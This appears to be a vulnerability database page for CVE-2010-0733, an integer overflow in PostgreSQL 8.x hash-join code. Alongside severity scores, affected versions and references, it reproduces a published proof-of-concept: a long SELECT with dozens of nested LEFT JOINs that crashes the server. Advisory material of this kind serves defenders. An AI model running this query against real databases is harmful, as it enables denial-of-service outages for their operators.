CVE-2010-0733 : Detail

CVE-2010-0733

8.3%V4
Network
2010-03-19
18h00 +00:00
2017-09-18
10h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Integer overflow in src/backend/executor/nodeHash.c in PostgreSQL 8.4.1 and earlier, and 8.5 through 8.5alpha2, allows remote authenticated users to cause a denial of service (daemon crash) via a SELECT statement with many LEFT JOIN clauses, related to certain hashtable size calculations.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-189 Category : Numeric Errors
Weaknesses in this category are related to improper calculation or conversion of numbers.

Metrics

Metrics Score Severity CVSS Vector Source
V2 3.5 AV:N/AC:M/Au:S/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 33729

Publication date : 2014-06-12 22h00 +00:00
Author : Bernt Marius Johnsen
EDB Verified : Yes

source: https://www.securityfocus.com/bid/38619/info PostgreSQL is prone to a remote denial-of-service vulnerability because it fails to properly validate user-supplied data before using it in memory-allocation calculations. An attacker can exploit this issue to cause the affected application to crash. Due to the nature of this issue, remote code execution may be possible; this has not been confirmed. SELECT * from B AS alias0 LEFT JOIN BB AS alias1 LEFT JOIN B AS alias2 LEFT JOIN A AS alias3 LEFT JOIN AA AS alias4 LEFT JOIN B AS alias5 ON alias4.int_key = alias5.int_key ON alias3.int_key = alias4.int_key LEFT JOIN AA AS alias6 LEFT JOIN A AS alias7 ON alias6.int_key = alias7.int_key LEFT JOIN BB AS alias8 ON alias7.int_key = alias8.int_key ON alias3.int_key = alias8.int_key LEFT JOIN AA AS alias9 ON alias6.int_key = alias9.int_key ON alias2.int_key = alias8.int_key LEFT JOIN BB AS alias10 LEFT JOIN AA AS alias11 LEFT JOIN B AS alias12 ON alias11.int_key = alias12.int_key ON alias10.int_key = alias11.int_key ON alias9.int_key = alias10.int_key ON alias1.int_key = alias8.int_key LEFT JOIN BB AS alias13 LEFT JOIN A AS alias14 LEFT JOIN AA AS alias15 LEFT JOIN A AS alias16 ON alias15.int_key = alias16.int_key LEFT JOIN B AS alias17 ON alias15.int_key = alias17.int_key ON alias14.int_key = alias16.int_key LEFT JOIN AA AS alias18 ON alias14.int_key = alias18.int_key LEFT JOIN B AS alias19 ON alias15.int_key = alias19.int_key LEFT JOIN AA AS alias20 ON alias16.int_key = alias20.int_key ON alias13.int_key = alias19.int_key LEFT JOIN A AS alias21 ON alias13.int_key = alias21.int_key ON alias3.int_key = alias17.int_key LEFT JOIN B AS alias22 ON alias7.int_key = alias22.int_key LEFT JOIN A AS alias23 ON alias20.int_key = alias23.int_key LEFT JOIN A AS alias24 ON alias14.int_key = alias24.int_key LEFT JOIN BB AS alias25 LEFT JOIN BB AS alias26 ON alias25.int_key = alias26.int_key LEFT JOIN A AS alias27 LEFT JOIN A AS alias28 ON alias27.int_key = alias28.int_key LEFT JOIN B AS alias29 LEFT JOIN BB AS alias30 LEFT JOIN B AS alias31 LEFT JOIN A AS alias32 LEFT JOIN B AS alias33 ON alias32.int_key = alias33.int_key LEFT JOIN A AS alias34 ON alias32.int_key = alias34.int_key ON alias31.int_key = alias33.int_key ON alias30.int_key = alias33.int_key ON alias29.int_key = alias34.int_key ON alias27.int_key = alias34.int_key LEFT JOIN AA AS alias35 LEFT JOIN A AS alias36 ON alias35.int_key = alias36.int_key ON alias34.int_key = alias36.int_key LEFT JOIN A AS alias37 ON alias33.int_key = alias37.int_key ON alias25.int_key = alias32.int_key LEFT JOIN A AS alias38 ON alias37.int_key = alias38.int_key ON alias15.int_key = alias37.int_key ON alias0.int_key = alias9.int_key

Products Mentioned

Configuraton 0

Postgresql>>Postgresql >> Version To (including) 8.4.1

Postgresql>>Postgresql >> Version 8.0

Postgresql>>Postgresql >> Version 8.0.0

Postgresql>>Postgresql >> Version 8.0.1

Postgresql>>Postgresql >> Version 8.0.2

Postgresql>>Postgresql >> Version 8.0.3

Postgresql>>Postgresql >> Version 8.0.4

Postgresql>>Postgresql >> Version 8.0.5

Postgresql>>Postgresql >> Version 8.0.6

Postgresql>>Postgresql >> Version 8.0.7

Postgresql>>Postgresql >> Version 8.0.8

Postgresql>>Postgresql >> Version 8.0.9

Postgresql>>Postgresql >> Version 8.0.10

Postgresql>>Postgresql >> Version 8.0.11

Postgresql>>Postgresql >> Version 8.0.12

Postgresql>>Postgresql >> Version 8.0.13

Postgresql>>Postgresql >> Version 8.0.14

Postgresql>>Postgresql >> Version 8.0.15

Postgresql>>Postgresql >> Version 8.0.16

Postgresql>>Postgresql >> Version 8.0.17

Postgresql>>Postgresql >> Version 8.0.18

Postgresql>>Postgresql >> Version 8.0.19

Postgresql>>Postgresql >> Version 8.0.20

Postgresql>>Postgresql >> Version 8.0.21

Postgresql>>Postgresql >> Version 8.0.22

Postgresql>>Postgresql >> Version 8.0.23

Postgresql>>Postgresql >> Version 8.0.24

Postgresql>>Postgresql >> Version 8.0.317

    Postgresql>>Postgresql >> Version 8.1

    Postgresql>>Postgresql >> Version 8.1.0

    Postgresql>>Postgresql >> Version 8.1.1

    Postgresql>>Postgresql >> Version 8.1.2

    Postgresql>>Postgresql >> Version 8.1.3

    Postgresql>>Postgresql >> Version 8.1.4

    Postgresql>>Postgresql >> Version 8.1.5

    Postgresql>>Postgresql >> Version 8.1.6

    Postgresql>>Postgresql >> Version 8.1.7

    Postgresql>>Postgresql >> Version 8.1.8

    Postgresql>>Postgresql >> Version 8.1.9

    Postgresql>>Postgresql >> Version 8.1.10

    Postgresql>>Postgresql >> Version 8.1.11

    Postgresql>>Postgresql >> Version 8.1.12

    Postgresql>>Postgresql >> Version 8.1.13

    Postgresql>>Postgresql >> Version 8.1.14

    Postgresql>>Postgresql >> Version 8.1.15

    Postgresql>>Postgresql >> Version 8.1.16

    Postgresql>>Postgresql >> Version 8.1.17

    Postgresql>>Postgresql >> Version 8.1.18

    Postgresql>>Postgresql >> Version 8.1.19

    Postgresql>>Postgresql >> Version 8.1.20

    Postgresql>>Postgresql >> Version 8.2

    Postgresql>>Postgresql >> Version 8.2.1

    Postgresql>>Postgresql >> Version 8.2.2

    Postgresql>>Postgresql >> Version 8.2.3

    Postgresql>>Postgresql >> Version 8.2.4

    Postgresql>>Postgresql >> Version 8.2.5

    Postgresql>>Postgresql >> Version 8.2.6

    Postgresql>>Postgresql >> Version 8.2.7

    Postgresql>>Postgresql >> Version 8.2.8

    Postgresql>>Postgresql >> Version 8.2.9

    Postgresql>>Postgresql >> Version 8.2.10

    Postgresql>>Postgresql >> Version 8.2.11

    Postgresql>>Postgresql >> Version 8.2.12

    Postgresql>>Postgresql >> Version 8.2.13

    Postgresql>>Postgresql >> Version 8.2.14

    Postgresql>>Postgresql >> Version 8.2.15

    Postgresql>>Postgresql >> Version 8.2.16

    Postgresql>>Postgresql >> Version 8.3

    Postgresql>>Postgresql >> Version 8.3.1

    Postgresql>>Postgresql >> Version 8.3.2

    Postgresql>>Postgresql >> Version 8.3.3

    Postgresql>>Postgresql >> Version 8.3.4

    Postgresql>>Postgresql >> Version 8.3.5

    Postgresql>>Postgresql >> Version 8.3.6

    Postgresql>>Postgresql >> Version 8.3.7

    Postgresql>>Postgresql >> Version 8.3.8

    Postgresql>>Postgresql >> Version 8.3.9

    Postgresql>>Postgresql >> Version 8.3.10

    Postgresql>>Postgresql >> Version 8.4

    Postgresql>>Postgresql >> Version 8.5

      Postgresql>>Postgresql >> Version 8.5

        Postgresql>>Postgresql >> Version 8.5

          References

          http://www.redhat.com/support/errata/RHSA-2010-0427.html
          Tags : vendor-advisory, x_refsource_REDHAT
          http://www.redhat.com/support/errata/RHSA-2010-0428.html
          Tags : vendor-advisory, x_refsource_REDHAT
          http://secunia.com/advisories/39820
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://www.securityfocus.com/bid/38619
          Tags : vdb-entry, x_refsource_BID
          http://www.openwall.com/lists/oss-security/2010/03/16/10
          Tags : mailing-list, x_refsource_MLIST
          http://www.openwall.com/lists/oss-security/2010/03/09/2
          Tags : mailing-list, x_refsource_MLIST
          http://www.redhat.com/support/errata/RHSA-2010-0429.html
          Tags : vendor-advisory, x_refsource_REDHAT
          http://www.vupen.com/english/advisories/2010/1197
          Tags : vdb-entry, x_refsource_VUPEN
          The information presented on CVE Find originates from several carefully selected reference sources. CVE data is provided by MITRE Corporation and the National Vulnerability Database (NVD). The Known Exploited Vulnerabilities (KEV) catalog is sourced from the Cybersecurity and Infrastructure Security Agency (CISA), while EPSS scores come from FIRST.org. Additionally, data regarding software weaknesses (CWE) and common attack patterns (CAPEC) is maintained by MITRE Corporation, and information on hardware and software configurations (CPE) is provided by the NVD.